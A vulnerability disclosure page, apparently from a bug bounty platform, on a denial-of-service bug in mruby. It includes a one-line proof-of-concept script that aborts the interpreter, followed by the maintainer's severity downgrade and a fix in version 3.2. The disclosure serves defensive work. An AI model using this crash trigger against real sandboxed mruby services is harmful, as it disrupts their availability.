Denial of service in mruby/mruby

Valid

Reported on

May 4th 2022


Affected commit

49b8cef31f01c0d88d874e17714dff1fa5b85df0

Proof of Concept

raise SystemStackError.new BasicObject.new

Expected:

Raise exception without abort the software

Case output:

root:~/mruby/mruby/bin# ./mruby poc.rb 
poc.rb:1: can't convert BasicObject into String (TypeError)
Aborted

Test Platform:

Ubuntu 18.04

Acknowledgements

This bug was found by Ken Wong(@wwkenwong) from Black Bauhinia(@blackb6a) and Alex Cheung

Impact

Denial of service

Occurrences

We are processing your report and will contact the mruby team within 24 hours. 2 years ago
We have contacted a member of the mruby team and are waiting to hear back 2 years ago
Yukihiro "Matz" Matsumoto modified the Severity from Critical to Low 2 years ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Yukihiro "Matz" Matsumoto validated this vulnerability 2 years ago

This is a bug, but to use it as a security vulnerability, it requires: (a) use libmruby to sandbox untrusted input (e.g. mruby-engine) (b)enable MRB_USE_STDIO which is fundamentally more dangerous for untrusted input

Considering those requirements, I mark this as low

wwkenwong has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Yukihiro "Matz" Matsumoto marked this as fixed in 3.2 with commit 457abf 2 years ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
error.c#L204 has been validated
to join this conversation